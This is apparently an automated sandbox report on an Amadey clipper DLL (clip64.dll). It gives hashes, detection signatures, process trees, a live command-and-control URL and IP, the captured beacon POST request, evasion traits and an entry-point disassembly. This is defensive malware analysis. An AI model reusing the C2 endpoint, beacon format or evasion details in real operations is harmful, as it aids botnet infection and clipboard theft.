Windows Analysis Report
clip64.dll

Overview

General Information

Sample name: clip64.dll
Analysis ID: 1579622
MD5: 7fe5b933ed9391ea24647479c80e904e
SHA1: 963721e46b8056e2e883c598e95d7daa7bdf8d9b
SHA256: 2e12355cb9b11c923dc06f195399d678bc46680e982856d9405f64e7563fe8b3
Tags: Amadey, dll, user-abuse_ch

Detection

Amadey
Score: 84
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected Amadey's Clipper DLL
C2 URLs / IPs found in malware configuration
Contains functionality to read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Program does not show much activity (idle)
Sample execution stops while process was sleeping (likely an evasion)
Uses 32bit PE files

Classification

  • System is w10x64
  • loaddll32.exe (PID: 7424 cmdline: loaddll32.exe "C:\Users\user\Desktop\clip64.dll" MD5: 51E6071F9CBA48E79F10C84515AAE618)
    • conhost.exe (PID: 7432 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 7476 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\clip64.dll",#1 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • rundll32.exe (PID: 7500 cmdline: rundll32.exe "C:\Users\user\Desktop\clip64.dll",#1 MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 7484 cmdline: rundll32.exe C:\Users\user\Desktop\clip64.dll,??4CClipperDLL@@QAEAAV0@$$QAV0@@Z MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 7596 cmdline: rundll32.exe C:\Users\user\Desktop\clip64.dll,??4CClipperDLL@@QAEAAV0@ABV0@@Z MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 7612 cmdline: rundll32.exe C:\Users\user\Desktop\clip64.dll,Main MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 7728 cmdline: rundll32.exe "C:\Users\user\Desktop\clip64.dll",??4CClipperDLL@@QAEAAV0@$$QAV0@@Z MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 7736 cmdline: rundll32.exe "C:\Users\user\Desktop\clip64.dll",??4CClipperDLL@@QAEAAV0@ABV0@@Z MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 7748 cmdline: rundll32.exe "C:\Users\user\Desktop\clip64.dll",Main MD5: 889B99C52A60DD49227C5E485A016679)
  • cleanup
Name: Amadey
Description: Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.
Attribution: No Attribution
Blogpost URLs / Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey
{"C2 url": "212.193.31.8/3ofn3jf3e2ljk2/index.php", "Version": "5.12"}
Yara matches (Source | Rule | Description | Author):
clip64.dll | JoeSecurity_Amadey_3 | Yara detected Amadey's Clipper DLL | Joe Security
7.2.rundll32.exe.6eb00000.0.unpack | JoeSecurity_Amadey_3 | Yara detected Amadey's Clipper DLL | Joe Security
11.2.rundll32.exe.6eb00000.0.unpack | JoeSecurity_Amadey_3 | Yara detected Amadey's Clipper DLL | Joe Security
No Sigma rule has matched
Suricata IDS alerts (Timestamp | SID | Severity | Classtype | Source | Destination | Protocol):
2024-12-23T06:46:41.952354+0100 | 2856151 | 1 | A Network Trojan was detected | 192.168.2.9:49731 | 212.193.31.8:80 | TCP
2024-12-23T06:46:44.592932+0100 | 2856151 | 1 | A Network Trojan was detected | 192.168.2.9:49738 | 212.193.31.8:80 | TCP

AV Detection

Source: clip64.dll | Malware Configuration Extractor: Amadey {"C2 url": "212.193.31.8/3ofn3jf3e2ljk2/index.php", "Version": "5.12"}
Source: clip64.dll | Virustotal: Detection: 69%
Source: clip64.dll | ReversingLabs: Detection: 68%
Source: clip64.dll | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, DLL
Source: clip64.dll | Static PE information: DYNAMIC_BASE, NX_COMPAT
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_6EB0BCEE FindFirstFileExW

Networking

Source: Network traffic | Suricata IDS: 2856151 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M7 : 192.168.2.9:49738 -> 212.193.31.8:80
Source: Network traffic | Suricata IDS: 2856151 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M7 : 192.168.2.9:49731 -> 212.193.31.8:80
Source: C:\Windows\SysWOW64\rundll32.exe | Network Connect: 212.193.31.8 80
Source: Malware configuration extractor | IPs: 212.193.31.8
Source: global traffic | HTTP traffic detected: POST /3ofn3jf3e2ljk2/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 212.193.31.8 Content-Length: 5 Cache-Control: no-cache Data Raw: 77 6c 74 3d 31 Data Ascii: wlt=1
Source: Joe Sandbox View | IP Address: 212.193.31.8
Source: Joe Sandbox View | ASN Name: SPD-NETTR
Source: unknown | TCP traffic detected without corresponding DNS query: 212.193.31.8
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_6EB01EC0 std::_Xinvalid_argument,InternetOpenW,InternetConnectA,HttpOpenRequestA,HttpSendRequestA,InternetReadFile,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle
Source: unknown | HTTP traffic detected: POST /3ofn3jf3e2ljk2/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 212.193.31.8 Content-Length: 5 Cache-Control: no-cache Data Raw: 77 6c 74 3d 31 Data Ascii: wlt=1
Source: rundll32.exe, 00000007.00000002.3219366641.0000000002FE0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3219366641.0000000002FCA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3219366641.0000000003018000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3219410372.0000000003297000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3219410372.0000000003260000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3219410372.000000000324A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://212.193.31.8/3ofn3jf3e2ljk2/index.php
Source: rundll32.exe, 00000007.00000002.3219366641.0000000003018000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://212.193.31.8/3ofn3jf3e2ljk2/index.php(
Source: rundll32.exe, 00000007.00000002.3219366641.0000000003018000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://212.193.31.8/3ofn3jf3e2ljk2/index.phpF
Source: rundll32.exe, 00000007.00000002.3219366641.0000000003018000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://212.193.31.8/3ofn3jf3e2ljk2/index.phpV
Source: rundll32.exe, 00000007.00000002.3219366641.0000000003018000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://212.193.31.8/3ofn3jf3e2ljk2/index.phpy
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_6EB031B0 OpenClipboard,GetClipboardData,GlobalLock,WideCharToMultiByte,WideCharToMultiByte,GlobalUnlock,CloseClipboard
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_6EB031B0
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_6EB11AB1
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: String function: 6EB05D90 appears 103 times
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: String function: 6EB073B0 appears 34 times
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: String function: 6EB06B05 appears 47 times
Source: clip64.dll | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, DLL
Source: classification engine | Classification label: mal84.troj.spyw.evad.winDLL@18/0@0/1
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7432:120:WilError_03
Source: clip64.dll | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\System32\loaddll32.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: clip64.dll | Virustotal: Detection: 69%
Source: clip64.dll | ReversingLabs: Detection: 68%
Source: unknown | Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\clip64.dll"
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\clip64.dll",#1
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\clip64.dll,??4CClipperDLL@@QAEAAV0@$$QAV0@@Z
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\clip64.dll",#1
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\clip64.dll,??4CClipperDLL@@QAEAAV0@ABV0@@Z
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\clip64.dll,Main
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\clip64.dll",??4CClipperDLL@@QAEAAV0@$$QAV0@@Z
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\clip64.dll",??4CClipperDLL@@QAEAAV0@ABV0@@Z
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\clip64.dll",Main
Source: C:\Windows\System32\loaddll32.exe | Section loaded: apphelp.dll
Source: C:\Windows\System32\loaddll32.exe | Section loaded: wininet.dll
Source: C:\Windows\System32\loaddll32.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\loaddll32.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\rundll32.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32
Source: clip64.dll | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: clip64.dll | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: clip64.dll | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: clip64.dll | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: clip64.dll | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: clip64.dll | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: clip64.dll | Static PE information: DYNAMIC_BASE, NX_COMPAT
Source: clip64.dll | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: clip64.dll | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: clip64.dll | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: clip64.dll | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: clip64.dll | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe TID: 7616 | Thread sleep count: 149 > 30
Source: C:\Windows\SysWOW64\rundll32.exe TID: 7616 | Thread sleep time: -149000s >= -30000s
Source: C:\Windows\SysWOW64\rundll32.exe TID: 7752 | Thread sleep count: 145 > 30
Source: C:\Windows\SysWOW64\rundll32.exe TID: 7752 | Thread sleep time: -145000s >= -30000s
Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exe | Last function: Thread delayed
Source: C:\Windows\System32\loaddll32.exe | Thread delayed: delay time: 120000
Source: rundll32.exe, 00000007.00000002.3219366641.0000000003029000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3219366641.0000000002FE0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3219410372.00000000032AB000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3219410372.0000000003260000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_6EB07288 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_6EB0A254 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_6EB0B881 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_6EB0D218 GetProcessHeap
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_6EB06B1A SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_6EB09820 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\SysWOW64\rundll32.exe | Network Connect: 212.193.31.8 80
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\clip64.dll",#1
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_6EB070A7 cpuid
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 7_2_6EB073F8 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter

Stealing of Sensitive Information

Source: Yara match | File source: clip64.dll, type: SAMPLE
Source: Yara match | File source: 7.2.rundll32.exe.6eb00000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 11.2.rundll32.exe.6eb00000.0.unpack, type: UNPACKEDPE
        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
        DLL Side-Loading
        111
        Process Injection
        11
        Virtualization/Sandbox Evasion
        OS Credential Dumping1
        System Time Discovery
        Remote Services1
        Archive Collected Data
        1
        Encrypted Channel
        Exfiltration Over Other Network MediumAbuse Accessibility Features
        CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
        DLL Side-Loading
        111
        Process Injection
        LSASS Memory21
        Security Software Discovery
        Remote Desktop Protocol2
        Clipboard Data
        1
        Ingress Tool Transfer
        Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
        Deobfuscate/Decode Files or Information
        Security Account Manager11
        Virtualization/Sandbox Evasion
        SMB/Windows Admin SharesData from Network Shared Drive1
        Non-Application Layer Protocol
        Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
        Obfuscated Files or Information
        NTDS1
        File and Directory Discovery
        Distributed Component Object ModelInput Capture11
        Application Layer Protocol
        Traffic DuplicationData Destruction
        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
        Rundll32
        LSA Secrets12
        System Information Discovery
        SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
        DLL Side-Loading
        Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
Behavior Graph ID: 1579622 | Sample: clip64.dll | Start date: 23/12/2024 | Architecture: WINDOWS | Score: 84
Graph nodes: loaddll32.exe started; rundll32.exe (x2), cmd.exe and 5 other processes started from it; rundll32.exe started from cmd.exe; System process connects to network (likely due to code injection or exploit); 212.193.31.8, ports 49731, 49738, 80, SPD-NETTR, Russian Federation

Antivirus detections (Source | Detection | Scanner | Label):
clip64.dll | 69% | Virustotal
clip64.dll | 68% | ReversingLabs | Win32.Trojan.Amadey
No Antivirus matches for dropped files, unpacked PE files, domains or URLs
Domains (Name | IP | Active | Malicious | Reputation):
s-part-0035.t-0009.t-msedge.net | 13.107.246.63 | true | false | high
URLs (Name | Malicious | Reputation):
http://212.193.31.8/3ofn3jf3e2ljk2/index.php | true | unknown
URLs from memory (Name | Source | Malicious | Reputation):
http://212.193.31.8/3ofn3jf3e2ljk2/index.phpy | rundll32.exe, 00000007.00000002.3219366641.0000000003018000.00000004.00000020.00020000.00000000.sdmp | false | unknown
http://212.193.31.8/3ofn3jf3e2ljk2/index.php( | rundll32.exe, 00000007.00000002.3219366641.0000000003018000.00000004.00000020.00020000.00000000.sdmp | false | unknown
http://212.193.31.8/3ofn3jf3e2ljk2/index.phpF | rundll32.exe, 00000007.00000002.3219366641.0000000003018000.00000004.00000020.00020000.00000000.sdmp | false | unknown
http://212.193.31.8/3ofn3jf3e2ljk2/index.phpV | rundll32.exe, 00000007.00000002.3219366641.0000000003018000.00000004.00000020.00020000.00000000.sdmp | false | unknown
IPs (IP | Domain | Country | ASN | ASN Name | Malicious):
212.193.31.8 | unknown | Russian Federation | 57844 | SPD-NETTR | true
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1579622
Start date and time: 2024-12-23 06:45:18 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 5m 31s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Run name: Run with higher sleep bypass
Number of analysed new started processes analysed: 16
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: clip64.dll
Detection: MAL
Classification: mal84.troj.spyw.evad.winDLL@18/0@0/1
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 9
• Number of non-executed functions: 28
Cookbook Comments:
• Found application associated with file extension: .dll
• Sleeps bigger than 100000000ms are automatically reduced to 1000ms
• Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
• Excluded IPs from analysis (whitelisted): 13.107.246.63, 4.245.163.56
• Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, azureedge-t-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information
• Report size getting too big, too many NtQueryValueKey calls found.
No simulations
IP context (Match | Associated Sample Name / URL | Detection | Threat Name | Context):
212.193.31.8 | cred64.dll.dll | malicious | Amadey | 212.193.31.8/3ofn3jf3e2ljk2/index.php?wal=1
212.193.31.8 | file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | 212.193.31.8/3ofn3jf3e2ljk2/index.php
212.193.31.8 | file.exe | malicious | LummaC, Amadey, LummaC Stealer, Xmrig | 212.193.31.8/3ofn3jf3e2ljk2/index.php
212.193.31.8 | file.exe | malicious | LummaC, Amadey, LummaC Stealer, Xmrig | 212.193.31.8/3ofn3jf3e2ljk2/index.php
212.193.31.8 | 6X4odkIkyK.exe | malicious | Amadey | 212.193.31.8/3ofn3jf3e2ljk2/index.php
Domain context (Match | Associated Sample Name / URL | Detection | Threat Name | Context):
s-part-0035.t-0009.t-msedge.net | https://staging.effimate.toyo.ai-powered-services.com/ | malicious | Unknown | 13.107.246.63
s-part-0035.t-0009.t-msedge.net | https://customervoice.microsoft.com/Pages/ResponsePage.aspx?id=Ne7lLAcjQUaMUQJ9C8JRxUnNOxFiqmxEvtl5lDv69HJUMDcyQThVMFBaMzdYWTM3RDY1SVZJUUVaSC4u | malicious | Unknown | 13.107.246.63
s-part-0035.t-0009.t-msedge.net | https://gADK.quantumdhub.ru/HX8hiLPadaz1N7WrltpPjHg34q_2C98ig/ | malicious | Unknown | 13.107.246.63
s-part-0035.t-0009.t-msedge.net | 1734732185f25c13093a41a2402fb93b0e0049d55263e81e9d0e56f9c3736f6444c26eed34495.dat-decoded.exe | malicious | LummaC | 13.107.246.63
s-part-0035.t-0009.t-msedge.net | 2QaN4hOyJs.exe | malicious | XWorm | 13.107.246.63
s-part-0035.t-0009.t-msedge.net | WwVs3PavPg.exe | malicious | Unknown | 13.107.246.63
s-part-0035.t-0009.t-msedge.net | Tsy9P2T9yF.exe | malicious | Unknown | 13.107.246.63
s-part-0035.t-0009.t-msedge.net | http://www.eventcreate.com/e/you-have-received-a-new-doc | malicious | HTMLPhisher | 13.107.246.63
s-part-0035.t-0009.t-msedge.net | gTU8ed4669.exe | malicious | Credential Flusher | 13.107.246.63
s-part-0035.t-0009.t-msedge.net | zSmMqGGeVy.exe | malicious | Unknown | 13.107.246.63
ASN context (Match | Associated Sample Name / URL | Detection | Threat Name | Context):
SPD-NETTR | cred64.dll.dll | malicious | Amadey | 212.193.31.8
SPD-NETTR | file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc | 212.193.31.8
SPD-NETTR | file.exe | malicious | LummaC, Amadey, LummaC Stealer, Xmrig | 212.193.31.8
SPD-NETTR | file.exe | malicious | LummaC, Amadey, LummaC Stealer, Xmrig | 212.193.31.8
SPD-NETTR | 6X4odkIkyK.exe | malicious | Amadey | 212.193.31.8
SPD-NETTR | mips.elf | malicious | Mirai | 185.72.8.231
SPD-NETTR | ppc.elf | malicious | Mirai | 185.72.8.231
SPD-NETTR | nshkmpsl.elf | malicious | Mirai | 185.72.8.231
SPD-NETTR | mipsel.nn.elf | malicious | Mirai, Okiru | 2.58.124.230
No context (JA3 fingerprints)
No context (dropped files)
No created / dropped files found
                    File type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                    Entropy (8bit):6.358923113331074
                    TrID:
                    • Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
                    • Generic Win/DOS Executable (2004/3) 0.20%
                    • DOS Executable Generic (2002/1) 0.20%
                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                    File name:clip64.dll
                    File size:126'976 bytes
                    MD5:7fe5b933ed9391ea24647479c80e904e
                    SHA1:963721e46b8056e2e883c598e95d7daa7bdf8d9b
                    SHA256:2e12355cb9b11c923dc06f195399d678bc46680e982856d9405f64e7563fe8b3
                    SHA512:82d92d0c5155fff5ce97099cb9e78422ff328e0c516fbab7634e624215366c2191ec6ff6fe8d939268275c6770accb208af7ac69c3cc13c9188a49ef41339bb0
                    SSDEEP:3072:wdkSZXB8ZuzQT7SgmEE8An/Y4Z3SNq6ZidU1ep/:LoGymSgjE8A3Z3yodUwp/
                    TLSH:6BC34B213496C031DA5D567E18A8ABF487BD6914DFB00DE777840E3B8E642C2EE34D7A
                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........P............................................................................@.......@.......@.~.....@.......Rich...........
                    Icon Hash:7ae282899bbab082
                    Entrypoint:0x10007062
                    Entrypoint Section:.text
                    Digitally signed:false
                    Imagebase:0x10000000
                    Subsystem:windows gui
                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE, DLL
                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT
                    Time Stamp:0x676432FA [Thu Dec 19 14:51:38 2024 UTC]
                    TLS Callbacks:
                    CLR (.Net) Version:
                    OS Version Major:6
                    OS Version Minor:0
                    File Version Major:6
                    File Version Minor:0
                    Subsystem Version Major:6
                    Subsystem Version Minor:0
                    Import Hash:fdb088ba51afbf555d7a0f495212d8f1
                    Instruction
                    push ebp
                    mov ebp, esp
                    cmp dword ptr [ebp+0Ch], 01h
                    jne 00007F81092F7317h
                    call 00007F81092F76EAh
                    push dword ptr [ebp+10h]
                    push dword ptr [ebp+0Ch]
                    push dword ptr [ebp+08h]
                    call 00007F81092F71C3h
                    add esp, 0Ch
                    pop ebp
                    retn 000Ch
                    jmp 00007F81092FB032h
                    push ebp
                    mov ebp, esp
                    sub esp, 0Ch
                    lea ecx, dword ptr [ebp-0Ch]
                    call 00007F81092F68C5h
                    push 1001C6E0h
                    lea eax, dword ptr [ebp-0Ch]
                    push eax
                    call 00007F81092F7D7Dh
                    int3
                    push ebp
                    mov ebp, esp
                    and dword ptr [1001F708h], 00000000h
                    sub esp, 24h
                    or dword ptr [1001E00Ch], 01h
                    push 0000000Ah
                    call dword ptr [10016050h]
                    test eax, eax
                    je 00007F81092F74BFh
                    and dword ptr [ebp-10h], 00000000h
                    xor eax, eax
                    push ebx
                    push esi
                    push edi
                    xor ecx, ecx
                    lea edi, dword ptr [ebp-24h]
                    push ebx
                    cpuid
                    mov esi, ebx
                    pop ebx
                    mov dword ptr [edi], eax
                    mov dword ptr [edi+04h], esi
                    mov dword ptr [edi+08h], ecx
                    xor ecx, ecx
                    mov dword ptr [edi+0Ch], edx
                    mov eax, dword ptr [ebp-24h]
                    mov edi, dword ptr [ebp-1Ch]
                    mov dword ptr [ebp-0Ch], eax
                    xor edi, 6C65746Eh
                    mov eax, dword ptr [ebp-18h]
                    xor eax, 49656E69h
                    mov dword ptr [ebp-08h], eax
                    mov eax, dword ptr [ebp-20h]
                    xor eax, 756E6547h
                    mov dword ptr [ebp-04h], eax
                    xor eax, eax
                    inc eax
                    push ebx
                    cpuid
                    mov esi, ebx
                    pop ebx
                    lea ebx, dword ptr [ebp-24h]
                    mov dword ptr [ebx], eax
                    mov eax, dword ptr [ebp-04h]
                    mov dword ptr [ebx+04h], esi
                    or eax, edi
                    or eax, dword ptr [ebp-08h]
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x1cd10 | 0x9c | .rdata
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x1cdac | 0x50 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x20000 | 0xf8 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x21000 | 0x1af8 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x1bb4c | 0x38 | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x1bb88 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x16000 | 0x14c | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x14306 | 0x14400 | c5367438634515ddeffb97d8398daef5 | False | 0.5099585262345679 | data | 6.5424517950156895 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x16000 | 0x752a | 0x7600 | 65440752dc27683442670c610d77c6fb | False | 0.4289261122881356 | data | 5.152405366954554 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x1e000 | 0x1fec | 0x1400 | 070ceab71158e4b98b9fbb2974a658d3 | False | 0.094140625 | data | 1.5445177251659354 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
